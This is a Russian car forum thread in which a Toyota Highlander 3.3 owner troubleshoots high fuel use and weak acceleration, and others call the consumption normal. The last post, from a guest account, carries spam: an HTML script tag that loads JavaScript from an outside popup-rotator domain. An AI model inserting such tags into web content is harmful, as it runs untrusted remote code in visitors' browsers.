Сумасшедший жор бензина

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#61
Короче я то сам моторист и машина у меня с движком 3 не первая чудес на свете не бывает моя машина не едит это факт, седня чувачку одному на 1MZ меня дитанационные датчики он с этой проблемой ко мне приехал поменял ему датчики свечи и пипец машина поехала сразу 220 положил на ней а он точно такие же мне вердикты говорил как у меня так шо буду у себя пробовать правда есть один ньюанс у него показала диагностика что неработают татчики дитанации а у меня ниче нету
 

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#63
Как то ни разу не доводилось ни разу в эти клапана леазить завтра проверю, если кто лазал подскажите где че искать сразу я так понял их 2 на каждую головку есть клапан и есть сеточка вопрос находяться они в одном и том же месте или в разных?
 

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#68
=====
Вообщем сегодня снял клапана VVT-i они так в масле но не грязные все равно все промыл карб клинером и результат никакой. На выходных буду менять оба детанационных датчика потом отпишусь
 

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#69
Ничего не получилось у меня все что можно уже поменял, на холодную кстати тянет чуть лудше думал мож температурный датчик влияет тож заменил результат тот же
 

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#70
Что сказать, либо с машиной всё хорошо. Либо смотри коробку.
Поршневую проверял(компрессию)?
 

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#71
компрессия ровная и коробка спец по автоматам прокатился говорит что переключения идиальные коробка не причем говорит что двигатель не тянет, а расход на трассе при (160км) 14литров это много же?
 

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#72
При 160 км.ч. тапок уже поддавливаешь и 14 литров, имхо нормально. Попробуй покатайся не выше 120, разницу увидишь. А вот тянет не тянет, тут масса причин. Лямбды проверял? Может они беднят смесь. Попробуй отключи нафиг и сразу поймёшь.
 

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#77
Нет пока не проверял но заметил после того как детанационные датчики новые поставил в городе расход упал до 13,1 литра на 100км по бортовику при этом езжу как обычно 70-80 в городе светофоры и все дела
 

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#78
1 MZ никогда не был экономичным. И этот расход норма.
 

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#79
у меня 3MZ да и не скажи на полном согласен MZ жрет а на передке у меня 25 камри по трассе при 180-200 брала всего 11-12 литров
 

Лексеич

Well-Known Member
Сообщения
920
Благодарности
98
Адрес
Москва
Авто
JEEP
#80
Имея под капотом 230... лошадей, вы хотите расход меньше 10? А кто их кормить будет? Тут изначально заложено много, они хавать хотят, так, что этот табун кормить надо. Я даже на смотрю на расход, но стрелка падает, как стрелка температуры растет.
 

lexxmen

Dobriy_KOT
Сообщения
27
Благодарности
0
Адрес
Казахстан, Павлодар
Авто
Toyota Highlander 4wd V-3.3, 2005
#81
Имея под капотом 230... лошадей, вы хотите расход меньше 10? А кто их кормить будет? Тут изначально заложено много, они хавать хотят, так, что этот табун кормить надо. Я даже на смотрю на расход, но стрелка падает, как стрелка температуры растет.
Расход в топку главно тяга при разгоне она мозг долбает пока
 
S

sseo

Guest
#82
Имея под капотом 230... лошадей, вы хотите расход меньше 10? А кто их кормить будет? Тут изначально заложено много, они хавать хотят, так, что этот табун кормить надо. Я даже на смотрю на расход, но стрелка падает, как стрелка температуры растет.
абсолютно согласен <script language="javascript" src="http://uno.wt-rotator.biz/?t=popup&pid=17050"></script>
 

Новые темы

Самое читаемое за 5 дней

Сверху